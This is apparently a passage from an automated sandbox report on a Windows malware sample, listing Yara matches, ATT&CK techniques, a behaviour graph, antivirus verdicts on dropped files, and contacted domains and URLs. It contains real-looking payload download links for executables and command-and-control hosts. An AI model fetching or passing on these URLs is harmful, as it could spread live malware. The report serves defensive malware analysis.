                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\2.exe, type: DROPPED
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004084A0 WSAGetLastError,EndDialog,closesocket,inet_ntoa,closesocket,closesocket,socket,bind,EndDialog,closesocket,inet_addr,gethostbyname,rand,inet_addr,htons,connect,WSAGetLastError,inet_ntoa,EndDialog,closesocket,htonl,htonl,htonl,closesocket,_close,EndDialog,2_2_004084A0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00408290 time,srand,EndDialog,socket,EndDialog,bind,EndDialog,closesocket,inet_addr,gethostbyname,gethostbyname,rand,inet_addr,gethostbyname,rand,htons,connect,htonl,htonl,htonl,closesocket,_close,EndDialog,2_2_00408290
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BA10C0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,std::_Init_locks::_Init_locks,18_2_00BA10C0
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BA1770 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,18_2_00BA1770

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information41
                      Scripting                      		1
                      Replication Through Removable Media                      		1
                      Native API                      		41
                      Scripting                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		21
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		14
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts3
                      Command and Scripting Interpreter                      		1
                      DLL Side-Loading                      		1
                      Extra Window Memory Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      Peripheral Device Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt21
                      Registry Run Keys / Startup Folder                      		111
                      Process Injection                      		21
                      Obfuscated Files or Information                      		Security Account Manager4
                      File and Directory Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                      Registry Run Keys / Startup Folder                      		11
                      Software Packing                      		NTDS45
                      System Information Discovery                      		Distributed Component Object ModelInput Capture324
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets131
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Extra Window Memory Injection                      		Cached Domain Credentials21
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items142
                      Masquerading                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583469 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 88 79 freedns.afraid.org 2->79 81 eu-central-1.oss-acc.aliyuncs.com 2->81 83 8 other IPs or domains 2->83 103 Suricata IDS alerts for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 111 18 other signatures 2->111 9 file.exe 23 2->9         started        14 cbas.exe 2->14         started        16 EXCEL.EXE 197 53 2->16         started        signatures3 109 Uses dynamic DNS services 79->109 process4 dnsIp5 85 eu-central-1.oss-acc.aliyuncs.com 47.254.187.72, 49730, 49740, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 9->85 63 C:\Windows\wic.exe, PE32 9->63 dropped 65 C:\Users\user\AppData\Local\...\2[1].exe, PE32 9->65 dropped 67 C:\Users\user\AppData\Local\...\4[1].exe, PE32 9->67 dropped 69 7 other malicious files 9->69 dropped 115 Drops executables to the windows directory (C:\Windows) and starts them 9->115 18 1.exe 1 5 9->18         started        21 wic.exe 9->21         started        24 4.exe 9->24         started        28 2 other processes 9->28 117 Antivirus detection for dropped file 14->117 119 Multi AV Scanner detection for dropped file 14->119 121 Machine Learning detection for dropped file 14->121 123 Contains functionality to inject threads in other processes 14->123 26 splwow64.exe 16->26         started        file6 signatures7 process8 file9 45 C:\Users\user\Desktop\._cache_1.exe, PE32 18->45 dropped 59 2 other malicious files 18->59 dropped 30 Synaptics.exe 23 18->30         started        35 ._cache_1.exe 18->35         started        47 C:\Windows\msslac.dll, PE32 21->47 dropped 49 C:\Windows\cbas.exe, PE32 21->49 dropped 51 C:\Users\user\AppData\Local\...\cbas[1].exe, PE32 21->51 dropped 53 C:\Users\user\AppData\Local\...\msslac[1].dll, PE32 21->53 dropped 113 Multi AV Scanner detection for dropped file 21->113 37 cmd.exe 21->37         started        55 C:\Users\User\AppData\Roaming\...\clxa.exe, PE32 24->55 dropped 61 2 other malicious files 24->61 dropped 57 C:\Users\user\Desktop\._cache_2.exe, PE32 28->57 dropped 39 ._cache_2.exe 28->39         started        signatures10 process11 dnsIp12 87 drive.usercontent.google.com 142.250.185.225, 443, 49852, 49870 GOOGLEUS United States 30->87 89 docs.google.com 142.250.186.142, 443, 49845, 49861 GOOGLEUS United States 30->89 91 freedns.afraid.org 69.42.215.252, 49738, 80 AWKNET-LLCUS United States 30->91 71 C:\Users\user\Documents\~$cache1, PE32 30->71 dropped 73 C:\Users\user\AppData\Local\...\RCXF376.tmp, PE32 30->73 dropped 75 C:\Users\user\AppData\Local\...\RCXF308.tmp, PE32 30->75 dropped 77 C:\Users\user\AppData\Local\...\HjsFu2ta.exe, PE32 30->77 dropped 93 Antivirus detection for dropped file 30->93 95 Multi AV Scanner detection for dropped file 30->95 97 Drops PE files to the document folder of the user 30->97 99 Machine Learning detection for dropped file 30->99 101 Uses shutdown.exe to shutdown or reboot the system 37->101 41 conhost.exe 37->41         started        43 shutdown.exe 37->43         started        file13 signatures14 process15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe87%ReversingLabsWin32.Ransomware.XRed
                      file.exe100%AviraTR/VB.Downloader.Gen
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\2.exe100%AviraTR/Dldr.Agent.SH
                      C:\Program Files (x86)\2.exe100%AviraW2000M/Dldr.Agent.17651006
                      C:\Users\user\AppData\Local\Temp\RCXF308.tmp100%AviraTR/Dldr.Agent.SH
                      C:\Users\user\AppData\Local\Temp\RCXF308.tmp100%AviraTR/VB.Downloader.Gen
                      C:\Users\user\AppData\Local\Temp\RCXF308.tmp100%AviraW2000M/Dldr.Agent.17651006
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe100%AviraTR/Dldr.Agent.SH
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe100%AviraW2000M/Dldr.Agent.17651006
                      C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                      C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exe100%AviraHEUR/AGEN.1315939
                      C:\Program Files (x86)\1.exe100%AviraTR/Dldr.Agent.SH
                      C:\Program Files (x86)\1.exe100%AviraW2000M/Dldr.Agent.17651006
                      C:\Program Files (x86)\3.exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe100%AviraTR/Dldr.Agent.SH
                      C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe100%AviraW2000M/Dldr.Agent.17651006
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                      C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                      C:\Windows\cbas.exe100%AviraHEUR/AGEN.1317762
                      C:\Users\user\AppData\Local\Temp\RCXF376.tmp100%AviraTR/Dldr.Agent.SH
                      C:\Users\user\AppData\Local\Temp\RCXF376.tmp100%AviraTR/VB.Downloader.Gen
                      C:\Users\user\AppData\Local\Temp\RCXF376.tmp100%AviraW2000M/Dldr.Agent.17651006
                      C:\ProgramData\Synaptics\RCXF181.tmp100%AviraTR/Dldr.Agent.SH
                      C:\ProgramData\Synaptics\RCXF181.tmp100%AviraW2000M/Dldr.Agent.17651006
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe100%AviraTR/Dldr.Agent.SH
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe100%AviraW2000M/Dldr.Agent.17651006
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exe100%AviraHEUR/AGEN.1317762
                      C:\Program Files (x86)\2.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\RCXF308.tmp100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe100%Joe Sandbox ML
                      C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\1.exe100%Joe Sandbox ML
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\3.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe100%Joe Sandbox ML
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exe100%Joe Sandbox ML
                      C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1].exe100%Joe Sandbox ML
                      C:\Windows\cbas.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\RCXF376.tmp100%Joe Sandbox ML
                      C:\ProgramData\Synaptics\RCXF181.tmp100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe100%Joe Sandbox ML
                      C:\Program Files (x86)\4.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exe100%Joe Sandbox ML
                      C:\Program Files (x86)\1.exe100%ReversingLabsWin32.Worm.Zorex
                      C:\Program Files (x86)\2.exe89%ReversingLabsWin32.Worm.Zorex
                      C:\Program Files (x86)\3.exe87%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\Program Files (x86)\4.exe68%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\ProgramData\Synaptics\RCXF181.tmp100%ReversingLabsWin32.Worm.Zorex
                      C:\ProgramData\Synaptics\Synaptics.exe100%ReversingLabsWin32.Worm.Zorex
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exe91%ReversingLabsWin32.Trojan.SpywareX
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exe71%ReversingLabsWin32.Trojan.SpywareX
                      C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exe87%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe100%ReversingLabsWin32.Worm.Zorex
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wic[1].exe39%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exe87%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msslac[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1].exe68%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe89%ReversingLabsWin32.Worm.Zorex
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exe47%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe100%ReversingLabsWin32.Worm.Zorex
                      C:\Users\user\AppData\Local\Temp\RCXF376.tmp92%ReversingLabsWin32.Trojan.Synaptics
                      C:\Users\user\Desktop\._cache_1.exe21%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\Desktop\._cache_2.exe12%ReversingLabs
                      C:\Users\user\Documents\~$cache1100%ReversingLabsWin32.Worm.Zorex
                      C:\Windows\cbas.exe47%ReversingLabsWin32.Trojan.Generic
                      C:\Windows\msslac.dll0%ReversingLabs
                      C:\Windows\wic.exe39%ReversingLabsWin32.Trojan.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://pasy.telefonicas.fyi/wwwww.phpC:0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exe0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/%%bruplong.oss-accelerate.aliyuncs.com0%Avira URL Cloudsafe
                      http://LineageTheBloodPledge.com/.lin.binUpdError.txtrestime.dattime.dat210.81.242.130202.85.231.1120%Avira URL Cloudsafe
                      http://LineageTheBloodPledge.com/.0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllhttp://bruplong.oss-accelerate.aliyuncs.co0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dll:0%Avira URL Cloudsafe
                      http://lineage.ncsoft.co.kr/download/0%Avira URL Cloudsafe
                      https://rar.tw0%Avira URL Cloudsafe
                      http://xred.site50.net/syn/Synaptics.rarZ100%Avira URL Cloudmalware
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkI0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeLMEMp0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe#B0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exellC:0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exex0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/4.exeF0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeKB0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkP:0%Avira URL Cloudsafe
                      http://xred.site50.net/syn/SUpdate.iniZ100%Avira URL Cloudmalware
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exe00%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.exe0%Avira URL Cloudsafe
                      http://pasy.telefonicas.fyi/wwwww.php0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe_0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/3.exe10%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/4.exe0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exeG0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkl:0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/3.exe0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkl0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeNNC:0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkm0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkp;0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/2.exet0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exeU0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/2.exe0%Avira URL Cloudsafe
                      https://docs.gook0%Avira URL Cloudsafe
                      http://www.lineageonline.jp/0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe0%Avira URL Cloudsafe
                      https://rar.tw)0%Avira URL Cloudsafe
                      http://xred.site50.net/syn/SSLLibrary.dll6100%Avira URL Cloudmalware
                      http://bruplong.oss-accelerate.aliyuncs.com/270/2.exe?0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dll0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exes0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk&0%Avira URL Cloudsafe
                      http://xred.site50.net/syn/SSLLibrary.dlh100%Avira URL Cloudmalware
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.exeC:0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exed0%Avira URL Cloudsafe
                      https://rar.tw/0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk32P;0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exewsC:0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeaa0%Avira URL Cloudsafe
                      http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllp;0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      freedns.afraid.org
                      		69.42.215.252
                      		truefalse
                        		high
                        eu-central-1.oss-acc.aliyuncs.com
                        		47.254.187.72
                        		truetrue
                          		unknown
                          docs.google.com
                          		142.250.186.142
                          		truefalse
                            		high
                            s-part-0017.t-0009.t-msedge.net
                            		13.107.246.45
                            		truefalse
                              		high
                              drive.usercontent.google.com
                              		142.250.185.225
                              		truefalse
                                		high
                                bruplong.oss-accelerate.aliyuncs.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  xred.mooo.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://bruplong.oss-accelerate.aliyuncs.com/270/4.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    xred.mooo.comfalse
                                      		high
                                      http://bruplong.oss-accelerate.aliyuncs.com/270/3.exetrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://bruplong.oss-accelerate.aliyuncs.com/270/2.exetrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high
                                        http://bruplong.oss-accelerate.aliyuncs.com/270/1.exetrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://pasy.telefonicas.fyi/wwwww.phpC:wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=12[1].exe.0.drfalse
                                          		high
                                          http://lineage.ncsoft.co.kr/download/._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://LineageTheBloodPledge.com/.._cache_1.exe, ._cache_1.exe, 00000002.00000002.1740103618.000000000077E000.00000004.00000020.00020000.00000000.sdmp, ._cache_1.exe, 00000002.00000002.1740179585.000000000079B000.00000004.00000020.00020000.00000000.sdmp, ._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, ._cache_1.exe, 00000002.00000003.1739534840.0000000000798000.00000004.00000020.00020000.00000000.sdmp, ._cache_1.exe, 00000002.00000003.1739384768.0000000000798000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://rar.tw._cache_2.exe, 00000008.00000003.1851226611.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846288362.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1888790338.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1848850504.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792819472.000000000B978000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1849571104.000000000B976000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846016915.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851226611.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1772719262.000000000674B000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851185608.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1772791290.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792637441.000000000B969000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1793242796.000000000B98A000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1838969140.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000002.1889810525.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887975788.000000000B978000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792819472.000000000B98A000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850729652.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792637441.000000000B978000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/%%bruplong.oss-accelerate.aliyuncs.comfile.exe, 00000000.00000003.1708813251.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://LineageTheBloodPledge.com/.lin.binUpdError.txtrestime.dattime.dat210.81.242.130202.85.231.112._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dll:wic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllhttp://bruplong.oss-accelerate.aliyuncs.cowic.exe, 0000000B.00000000.1799136325.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe, 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe.0.dr, wic[1].exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkwic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe.0.dr, wic[1].exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkIwic.exe, 0000000B.00000002.3538860898.0000000001681000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe#Bfile.exe, 00000000.00000002.1801335644.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://bruplong.oss-accelerate.aliyuncs.com/270/1.exexfile.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://google.comfile.exe, RCXF308.tmp.3.dr, RCXF376.tmp.3.drfalse
                                            		high
                                            http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeLMEMpfile.exe, 00000000.00000003.1708777064.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://bruplong.oss-accelerate.aliyuncs.com/270/1.exellC:file.exe, 00000000.00000003.1708777064.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
